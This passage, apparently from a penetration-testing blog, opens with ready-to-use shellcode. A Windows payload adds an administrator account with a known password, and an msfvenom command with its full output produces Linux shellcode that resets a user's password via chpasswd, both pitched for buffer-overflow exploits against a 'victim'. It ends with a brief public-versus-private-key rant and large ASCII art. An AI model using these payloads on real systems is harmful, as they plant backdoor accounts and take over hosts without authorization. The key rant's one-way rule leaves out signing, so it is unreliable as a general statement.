buf += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
buf += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00"
buf += "\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5"
buf += "\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a"
buf += "\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
buf += "\xff\xd5\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x61\x64"
buf += "\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x20\x71"
buf += "\x77\x65\x72\x74\x79\x20\x2f\x61\x64\x64\x00"

Of course, you do this only if you have a RDP protocol running on the victim server. Else, adding an administrator user will be little use. 

The same can be done on a linux host too, provided you have other means such as ssh to reach the victim, you can opt for the

# msfvenom -p linux/x86/exec CMD='echo hacker:pass123 | chpasswd' -f python

No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 66 bytes
Final size of python file: 334 bytes
buf =  ""
buf += "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f"
buf += "\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x1f"
buf += "\x00\x00\x00\x65\x63\x68\x6f\x20\x68\x61\x63\x6b\x65"
buf += "\x72\x3a\x70\x61\x73\x73\x31\x32\x33\x20\x7c\x20\x63"
buf += "\x68\x70\x61\x73\x73\x77\x64\x00\x57\x53\x89\xe1\xcd"
buf += "\x80" 

If you noticed, the shellcode for the exec commands are way smaller than the reverse shell. 

This is an advantage if you are writing buffer overflows exploits with limited buffer space.

Recon Script for Penetration Testing

Here's a short bash script I found on the web, I wrote few extra functions to include enumeration for services such as ftp, ssh, dns, etc. This is useful for enumeration during penetration testing, much of these functions are very routine so scripting it will definitely safe you time. Credits to the original author.

Public Key vs Private Key

Now, I know there are lots of information on PKI out there but for heavens sake, I still see infosec peeps that can't tell the difference between a public and a private key! #facepalm. I even seen questions and answers in a well known InfoSec certification course got it mixed up!

So for heavensake, pleaseeeeee...let it be be known, the public key is used for encryption and the private key is used for decryption. It is easy to remember, simple because you give out your public key to people because they use it to send you encrypted content that only YOU can decrypt!

With that in mind, please keep your private key private. :-p

                                                                                                                 ,'+@;`                                
                                                                                                              +@@@+';+@@@;              ;@@@+.         
                                                                                                            #@#,,,,,,,,,,#@,         '@@+;::'@@@       
                                                                                                           @#,,,,,,,,,,,,,,@@      .@#,,,,,,,,,:@@     
                                                                                                          @;,,,,,,,:;,,,,,,,+@    #@,,,,,,,,,,,,,+@    
                                                                                                         @:,,,,;@@@@@@@@:,,,,'@  +@,,,,,,,,,,,,,,,;@   
                                                                                                        @:,,,,@@       .@@,,,,+@,@,,,,,+@@@@@@,,,,,;@  
                                                                                                       +#,,,:@.          '@,,,,@@,,,,:@#     ,@@,,,,@+ 
                                                                                                       @,,,,@             ,@,,,,+,,,:@         @@,,,,@ 
                                                                                                      #+,,,@`              +@,,,,,,,@           @+,,,#'
                                                                                                      @,,,'@                @,,,,,,#+            @,,,,@
                                                                                                      @,,,@                 :@,,,,,@             @;,,,@
                                                                                                     ,@,,,@                  @,,,,,@             `@,,,@
                                                                                                     +',,:@                  @,,,,:@              @,,,@
                                                                                                     @:,,'#                  @''++#@              @,,,@
                                                                                                     #;,,;@                  #+'';:,             .@,,,@
                                                                                                     +',,:@                                      @:,,,@
                                                                                                     ,@,,,@                                      @,,,:@
                                                                                                      @,,,@`                                    @;,,,@:
                                                                                                      @,,,:@                 ;@#               @#,,,,@ 
                                                                                                      '#,,,@:               @#;'@@           @@;,,,,@, 
                                                                                                       @,,,,@`             .@,,,,#@     ;@@@@',,,,,#@  
                                                                                                       +@,,,,@:          . '+,,,,,@+    #',,,,,,,,+@   
                                                                                                        @',,,,@@.      :@@`,@,,,,,,@    @:,,,,,,,@@    
                                                                                                         @:,,,,:@@@@@@@@,,@@:,,,,,,@    @,,,,,,#@;     
                                                                                                          @;,,,,,,,,,,,,,,::,,,,,,,@    @,,,,,,'@      
                                                                                                           @@,,,,,,,,,,,,,,,,,,,,,,@    @#;,,,,,:@`    
                                                                                                            '@@,,,,,,,,,,,,,,,,@@@@,     :@@#,,,,:@    
                                                                                                              ;@@@#++#@:,,,,,:@``.          #@:,,,'@   
                                                                                                                  :+@@,,,,,,,,#@             `@:,,,@:  
                                                                                                                .@@@:,,,,,,,,,,@#              @,,,,@  
                                                                                                             ,@@@;,,,,,,,,,,,,:@               ;@,,,@. 
                                                                                                             +',,,,,,,,,,,@,,,@`                @,,,;@ 
                                                                                                             @:,,,,,,,,,,#+,,,@                 ;#,,,@ 
                                                                                                         ;'  @,,,,,,,,,,;@:,,;@                  @,,,@ 
                                                                                                       ;@#+@#@,,,,,,,,,,@@,,,+;                  @,,,@ 
                                                                                                       @,,,,@@,,,,,,,,,'@@,,,#,                  @,,,@ 
                                                                                                      ;#,,,,,,,,,,,,,,,@ @,,,#;                  @,,,@ 
                                                                                                      '+,,,,,,,,,,,,,,,@ @:,,'#                  @,,,@ 
                                                                                                      `@,,,,,,,,,,,,,,#; '+,,,@                 :@,,,@ 
                                                                                                       @@,,,,,,,,::;'+@   @,,,@                 @:,,:@ 
                                                                                                       @#,,,,,,,:@@#+':   @,,,:@               .@,,,@. 
                                                                                                      @',,,,,,,,,:@       ++,,,@+              @,,,,@  
                                                                                                     @;,,,,,,,,,,,@.       @,,,,@'            @;,,,@;  
                                                                                                    @:,,,,,,,,,,,,+;       ;@,,,,@@         ,@;,,,:@   
                                                                                                  .@:,,,,,,,#;,,,,@         @+,,,,'@@.    +@@,,,,,@    
                                                                                                 ,@,,,,,,,,@@@;,,#@          @#,,,,,;@@@@@+,,,,,,@`    
                                                                                                '@,,,,,,,,@@  @@@+            @@,,,,,,,,,,,,,,,;@,     
                                                                                               +@,,,,,,,,@#                    #@',,,,,,,,,,,,@@       
                                                                                              @@,,,,,,,,@+                       @@#,,,,,,,'@@,        
                                                                                             @@,,,,,,,,@'                          ;@@@@@@@#`          
                                                                                            @#,,,,,,,,@:                                               
                                                                                           @+,,,,,,,:@.                                                
                                                                                          @',,,,,,,:@`                                                 
                                                                                         @;,,,,,,,;@                                                   
                                                                                       `@:,,,,,,,'@                                                    
                                                                                      .@:,,,,,,,+@                                                     
                                                                                     :@,,,,,,,,#@                                                      
                                                                                    '@,,,,,,,,@@                                                       
                                                                                   #@,,,,,,,,@@                                                        
                                                                                  @@,,,,,,,,@#                                                         
                                                                                 @@,,,,,,,,@+                                                          
                                                                                @#,,,,,,,,@;                                                           
                                                                               @+,,,,,,,,@,                                                            
                                                                              @;,,,,,,,:@.                                                             
                                                                             @:,,,,,,,:@`                                                              
                                                                           `@:,,,,,,,;@                                                                
                                                                          ,@,,,,,,,,'@                                                                 
                                                                         ;@,,,,,,,,+@                                                                  
                                                                        +@,,,,,,,,#@                                                                   
                                                                       #@,,,,,,,,@@                                                                    
                                                                      @@,,,,,,,,@@                                                                     
                                                                     @#,,,,,,,,@#                                                                      
                                                                    @#,,,,,,,,@+                                                                       
                                                                   @',,,,,,,,@;                                                                        
                             ;                                    @;,,,,,,,,@,                                                                         
                            +@@                                 `@:,,,,,,,:@.                                                                          
                           #@,'@                               .@:,,,,,,,:@`                                                                           
                          @@,,,+@                             :@,,,,,,,,;@                                                                             
                         @@,,,,,#@                           '@,,,,,,,,'@                                                                              
                        @#,,,,,,,@@                         #@,,,,,,,,+@                                                                               
                       @#,,,,,,,,,@#                       @@,,,,,,,,#@                                                                                
                        @;,,,,,,,,,@'                     @@,,,,,,,,@@                                                                                 
                         @:,,,,,,,,,@:                   @#,,,,,,,,@@                                                                                  
                   `      @:,,,,,,,,'@                  @+,,,,,,,,@#                                                                                   
                  ,@@     `@,,,,,,,,@                  @',,,,,,,,@+                                                                                    
                 :@,#@     .@,,,,,,##                 @;,,,,,,,,@;                                                                                     
                +@,,,#@     :@,,,,,:@  .@           `@:,,,,,,,,@,                                                                                      
               #@,,,,,@#    @@,,,,,,:@@@;@         .@,,,,,,,,:@`                                                                                       
              :@,,,,,,,@+  @#,,,,,,,,;,,,'@       ;@,,,,,,,,:@                                                                                         
               '@,,,,,,,@;@#,,,,,,,,,,,,,,+@     +@,,,,,,,,;@                                                                                          
                #@,,,,,,,@',,,,,,,,,,,,,,,@#    #@,,,,,,,,'@                                                                                           
           ;     @@,,,,,,,,,,,,,,,,,,,,,,@'    @@,,,,,,,,+@                                                                                            
          @@,     @#,,,,,,,,,,,,,,,,,,,,@:    @@,,,,,,,,#@                                                                                             
         @;,@`     @+,,,,,,,,,,,,,,,,,,@.    @#,,,,,,,,@@                                                                                              
       `@:,,,@      @',,,,,,,,,,,,,,,:@`    @+,,,,,,,,@@                                                                                               
      .@:,,,,:@    ;@,,,,,,,,,,,,,,,:@     @;,,,,,,,,@#                                                                                                
     :@,,,,,,,:@  +@,,,,,,,,,,,,,,,'@     @:,,,,,,,,@'                                                                                                 
    ;@,,,,,,,,,;@#@,,,,,,,,,,,,,,,,#@   `@:,,,,,,,,@:                                                                                                  
     #@,,,,,,,,,+@,,,,,,,,,,,,,,,,,,@@ ,@,,,,,,,,,@,                                                                                                   
      @@,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@#@,,,,,,,,:@`                                                                                                    
       @#,,,,,,,,,,,,,,,,,,,,,,,,,,,,#@,,,,,,,,:@                                                                                                      
        @+,,,,,,,,,,,,,,,,,,,,,,,,,,@@,,,,,,,,;@                                                                                                       
         @;,,,,,,,,,,,,,,,,,,,,,,,,@@,,,,,,,,+@                                                                                                        
          @:,,,,,,,,,,,,,,,,,,,,,,@#,,,,,,,,#@                                                                                                         
           @:,@@,,,,,,,,,,,,,,,,,@#,,,,,,,,#@                                                                                                          
            @@;`@,,,,,,,,:@#,,,,@',,,,,,,,@@                                                                                                           
                .@,,,,,,:@ @+,,@;,,,,,,,,@@                                                                                                            
                ##,,,,,;@   @'@:,,,,,,,,@#                                                                                                             
                @,,,,,+@    .@:,,,,,,,,@'                                                                                                              
               +@,,,,#@    :@,,,,,,,,,@:                                                                                                               
                #@,,@@    '@,,,,,,,,,@.                                                                                                                
                 @@@@    #@,,,,,,,,:@`                                                                                                                 
                  @#    @@,,,,,,,,:@                                                                                                                   
                       @@,,,,,,,,;@                                                                                                                    
                      @#,,,,,,,,+@                                                                                                                     
                     ,@,,,,,,,,#@                                                                                                                      
                      #@,,,,,,#@                                                                                                                       
                  @@@@@#@,,,,@@                                                                                                                        
                 @#,,,,,@@,,@#                                                                                                                         
                #@,,,,,,'@#@+                                                                                                                          
                @,,,,,,,@ @'                                                                                                                           
                @,,,,,,,@                                                                                                                              
                @,,,,,,,@                                                                                                                              
                ;@,,,,,##                                                                                                                              
                 @@,,,@@                                                                                                                               
                  ;@@@'